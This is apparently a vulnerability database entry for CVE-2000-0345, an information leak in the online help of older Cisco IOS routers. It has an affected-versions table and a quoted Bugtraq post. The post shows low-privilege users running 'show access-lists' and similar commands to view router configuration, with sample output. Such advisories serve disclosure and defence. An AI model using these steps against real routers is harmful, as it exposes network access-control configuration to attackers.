ID
VAR-E-200005-0121
CVE
cve_id: | CVE-2000-0345 | Trust: 0.3 |
TITLE
Cisco Router Online Help Vulnerability
Trust: 0.3
DESCRIPTION
Under certain revisions of IOS, multiple Cisco routers have an information leakage vulnerability in their online help systems. In essence, this vulnerability allows users who currently have access to the router at a low level of privilege (users without access to the 'enable' password) to use the help system to view information which should, in theory, only be available to an 'enabled' user. This information includes access lists, among other things. The help system itself does not list these items as being available via the 'show' commands, yet it will nonetheless execute them.
The message which detailed this vulnerability to the Bugtraq mailing list is attached in the 'Credit' section of this vulnerability entry. It is suggested that you read it if this vulnerability affects your infrastructure.
Trust: 0.3
AFFECTED PRODUCTS
vendor: | cisco | model: | ios | scope: | eq | version: | 12.0.7 | Trust: 0.3 |
vendor: | cisco | model: | ios | scope: | eq | version: | 12.0.6 | Trust: 0.3 |
vendor: | cisco | model: | ios | scope: | eq | version: | 12.0.5 | Trust: 0.3 |
vendor: | cisco | model: | ios t | scope: | eq | version: | 12.0.4 | Trust: 0.3 |
vendor: | cisco | model: | ios s | scope: | eq | version: | 12.0.4 | Trust: 0.3 |
vendor: | cisco | model: | ios | scope: | eq | version: | 12.0.4 | Trust: 0.3 |
vendor: | cisco | model: | ios t2 | scope: | eq | version: | 12.0.3 | Trust: 0.3 |
vendor: | cisco | model: | ios xg | scope: | eq | version: | 12.0.2 | Trust: 0.3 |
vendor: | cisco | model: | ios xf | scope: | eq | version: | 12.0.2 | Trust: 0.3 |
vendor: | cisco | model: | ios xd | scope: | eq | version: | 12.0.2 | Trust: 0.3 |
vendor: | cisco | model: | ios xc | scope: | eq | version: | 12.0.2 | Trust: 0.3 |
vendor: | cisco | model: | ios | scope: | eq | version: | 12.0.2 | Trust: 0.3 |
vendor: | cisco | model: | ios xe | scope: | eq | version: | 12.0.1 | Trust: 0.3 |
vendor: | cisco | model: | ios xb | scope: | eq | version: | 12.0.1 | Trust: 0.3 |
vendor: | cisco | model: | ios xa3 | scope: | eq | version: | 12.0.1 | Trust: 0.3 |
vendor: | cisco | model: | ios w | scope: | eq | version: | 12.0.1 | Trust: 0.3 |
vendor: | cisco | model: | ios bc | scope: | eq | version: | 11.2.10 | Trust: 0.3 |
vendor: | cisco | model: | ios | scope: | eq | version: | 11.2.10 | Trust: 0.3 |
vendor: | cisco | model: | ios xa | scope: | eq | version: | 11.2.9 | Trust: 0.3 |
vendor: | cisco | model: | ios p | scope: | eq | version: | 11.2.9 | Trust: 0.3 |
vendor: | cisco | model: | ios sa5 | scope: | eq | version: | 11.2.8 | Trust: 0.3 |
vendor: | cisco | model: | ios sa3 | scope: | eq | version: | 11.2.8 | Trust: 0.3 |
vendor: | cisco | model: | ios sa1 | scope: | eq | version: | 11.2.8 | Trust: 0.3 |
vendor: | cisco | model: | ios p | scope: | eq | version: | 11.2.8 | Trust: 0.3 |
vendor: | cisco | model: | ios | scope: | eq | version: | 11.2.8 | Trust: 0.3 |
vendor: | cisco | model: | ios f1 | scope: | eq | version: | 11.2.4 | Trust: 0.3 |
vendor: | cisco | model: | ios ct | scope: | eq | version: | 11.1.17 | Trust: 0.3 |
vendor: | cisco | model: | ios cc | scope: | eq | version: | 11.1.17 | Trust: 0.3 |
vendor: | cisco | model: | ios ia | scope: | eq | version: | 11.1.16 | Trust: 0.3 |
vendor: | cisco | model: | ios aa | scope: | eq | version: | 11.1.16 | Trust: 0.3 |
vendor: | cisco | model: | ios | scope: | eq | version: | 11.1.16 | Trust: 0.3 |
vendor: | cisco | model: | ios ca | scope: | eq | version: | 11.1.15 | Trust: 0.3 |
vendor: | cisco | model: | ios ia | scope: | eq | version: | 11.1.13 | Trust: 0.3 |
vendor: | cisco | model: | ios ca | scope: | eq | version: | 11.1.13 | Trust: 0.3 |
vendor: | cisco | model: | ios aa | scope: | eq | version: | 11.1.13 | Trust: 0.3 |
vendor: | cisco | model: | ios | scope: | eq | version: | 11.1.13 | Trust: 0.3 |
vendor: | cisco | model: | ios | scope: | eq | version: | 9.14 | Trust: 0.3 |
vendor: | cisco | model: | ios 12.0t | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.0s | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.0db | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.0 s | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios | scope: | eq | version: | 12.0(8) | Trust: 0.3 |
vendor: | cisco | model: | ios 12.0 t | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.0 t1 | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios | scope: | eq | version: | 12.0 | Trust: 0.3 |
vendor: | cisco | model: | ios 11.2p | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios | scope: | eq | version: | 11.2(17) | Trust: 0.3 |
vendor: | cisco | model: | ios | scope: | eq | version: | 11.2 | Trust: 0.3 |
vendor: | cisco | model: | ios | scope: | eq | version: | 11.1 | Trust: 0.3 |
vendor: | cisco | model: | hsrp | scope: | eq | version: | 7500.0 | Trust: 0.3 |
vendor: | cisco | model: | hsrp | scope: | eq | version: | 7200.0 | Trust: 0.3 |
vendor: | cisco | model: | hsrp | scope: | eq | version: | 4000.0 | Trust: 0.3 |
vendor: | cisco | model: | hsrp | scope: | eq | version: | 3600.0 | Trust: 0.3 |
vendor: | cisco | model: | hsrp | scope: | eq | version: | 2600.0 | Trust: 0.3 |
vendor: | cisco | model: | hsrp | scope: | eq | version: | 2500.0 | Trust: 0.3 |
vendor: | cisco | model: | - | scope: | eq | version: | 7500 | Trust: 0.3 |
vendor: | cisco | model: | - | scope: | eq | version: | 7200 | Trust: 0.3 |
vendor: | cisco | model: | - | scope: | eq | version: | 4000 | Trust: 0.3 |
vendor: | cisco | model: | - | scope: | eq | version: | 3600 | Trust: 0.3 |
vendor: | cisco | model: | - | scope: | eq | version: | 2600 | Trust: 0.3 |
vendor: | cisco | model: | - | scope: | eq | version: | 2500 | Trust: 0.3 |
EXPLOIT
As taken from the original post on this vulnerability (see the Credits section):
Routers tested: 2500, 2600, 3600, 4000, 7200, 7500 series,
running IOS 9.14, 11.1(21) (Distributed Director), 11.2(x)
and 12.0(x). Some were tested on the local console, some
over Telnet. We recently tested PIX 4.x, and found it was
NOT vulnerable.
A regular user will log on with privilege level equal to 1.
This can be shown by running "show privilege" after logging
on the router. For example:
User Access Verification
Username: joeuser
Password: <password>
Router2>sh priv
Current privilege level is 1
Router2>
Now, if we try to get a list of all possible "show"
commands, by doing "show ?", we get:
Router2>show privilege
Current privilege level is 1
Router2>show ?
backup Backup status
cef Cisco Express Forwarding
clock Display the system clock
dialer Dialer parameters and statistics
flash: display information about flash: file
system
history Display the session command history
...
Notice that we did not see an "access-lists" option, so the
help system thinks we should not be able to run it...
However,
Router2>show privilege
Current privilege level is 1
Router2>show access-lists
Standard IP access list 10
permit 172.16.0.1
deny any
Extended IP access list eth0-IN
permit udp host 172.16.0.1 10.11.12.0 0.0.0.255 eq
snmp (14982 matches)
permit udp host 172.16.0.1 10.11.13.128 0.0.0.127 eq
snmp (4026 matches)
So, we can see the configuration, even though we shouldn't.
We can't alter it, but even seeing the access-list is
beneficial to an attacker.
Upon further testing on a 3640 running IOS 12.0(5), we got
the following results:
- We found 75 "show" commands that are supposed to be
available only in enable mode. Meaning: the difference
between "show ?" in enabled and disabled mode was these 75
commands
- Out of 75, only 13 were truly restricted. The other 62
were available to be viewed by a session in a disabled mode.
- Out of the 62 that were viewable, we counted 7 as being
potentially very dangerous. "show ip" is one of them, as
well as "show cdp", "show logging", "show cdp", "show
vlans". There are others, but I don't have my list with me
right now.
- By combining "show ip" and "show access-lists" we had a
very clear picture of how access-lists were distributed in
the router.
Trust: 0.3
PRICE
Free
Trust: 0.3
TYPE
Access Validation Error
Trust: 0.3
CREDITS
This bug was discovered and documented by Fernando Montenegro fsmontenegro@iname.com and Claudio Silotto (csilotto@hotmail.com). The message detailing this vulnerability was sent to the Bugtraq mailing list on 2 May 2000.
Trust: 0.3
EXTERNAL IDS
db: | NVD | id: | CVE-2000-0345 | Trust: 0.3 |
db: | BID | id: | 1161 | Trust: 0.3 |
REFERENCES
url: | http://www.cisco.com/warp/public/707/sec_incident_response.shtml | Trust: 0.3 |
SOURCES
db: | BID | id: | 1161 |
LAST UPDATE DATE
2022-07-27T09:51:18.831000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 1161 | date: | 2009-07-11T01:56:00 |
SOURCES RELEASE DATE
db: | BID | id: | 1161 | date: | 2000-05-03T00:00:00 |